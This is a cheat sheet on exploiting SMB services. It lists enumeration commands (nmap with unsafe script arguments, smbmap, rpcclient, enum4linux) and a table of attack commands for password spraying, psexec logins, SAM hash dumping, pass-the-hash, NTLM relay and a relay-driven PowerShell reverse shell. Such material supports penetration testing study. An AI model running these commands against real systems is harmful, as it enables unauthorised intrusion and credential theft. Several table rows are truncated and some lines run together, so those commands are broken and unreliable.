Views: 26
Exploiting SMB
SMB Enumeration
- Enumerate Hostname –
nmblookup -A [ip] - List Shares
smbmap -H [ip/hostname]echo exit | smbclient -L \\\\[ip]nmap --script smb-enum-shares -p 139,445 [ip]
- Check Null Sessions
smbmap -H [ip/hostname]rpcclient -U "" -N [ip]smbclient \\\\[ip]\\[share name]
- Check for Vulnerabilities –
nmap --script smb-vuln* -p 139,445 [ip] - Overall Scan –
enum4linux -a [ip] - Manual Inspection
smbver.sh [IP] (port)[Samba]- check pcap
Nmap Enumeration
Nmap Enumeration
nmap --script=smb-enum* --script-args=unsafe=1 -T5 <host>
nmap --script "safe or smb-enum-*" -p 445 <host>
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse <host>
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-enum-groups,smb-enum-processes,smb-enum-shares,smb-enum-users,smb-ls,smb-os-discovery --script-args=unsafe=1 -T5 <host>
# with credentials
nmap -sV -Pn -vv -p 445 --script-args smbuser=<benutzer>,smbpass=<passwort> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 <host>
# List all NSE Scripts
ls -l /usr/share/nmap/scripts/smb*| Command | Description |
|---|---|
smbclient -N -L //10.10.10.1 | Null-session testing against the SMB service. |
smbmap -H 10.10.10.1 | Network share enumeration using smbmap. |
smbmap -H | Recursive network share enumeration using smbmap. |
smbmap -H | Download a specific file from the shared folder. |
smbmap -H | Upload a specific file to the shared folder. |
rpcclient -U'%' | Null-session with the rpcclient. |
./enum4linux-ng.py | Automated enumeratition of the SMB service using enum4linux-ng. |
crackmapexec smb | Password spraying against different users from a list. |
impacket-psexec administrator:'Password123!'@ | Connect to the SMB service using the impacket-psexec. |
crackmapexec smb | Execute a command over the SMB service using crackmapexec. |
crackmapexec smb /24 -u administrator -p 'Password123!' --loggedon-users | Enumerating Logged-on users. |
crackmapexec smb | Extract hashes from the SAM database. |
crackmapexec smb | Use the Pass-The-Hash technique to authenticate on the target host. |
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.1 | Dump the SAM database using impacket-ntlmrelayx. |
impacket-ntlmrelayx --no-http-server -smb2support -t | Execute a PowerShell based reverse shell using impacket-ntlmrelayx. |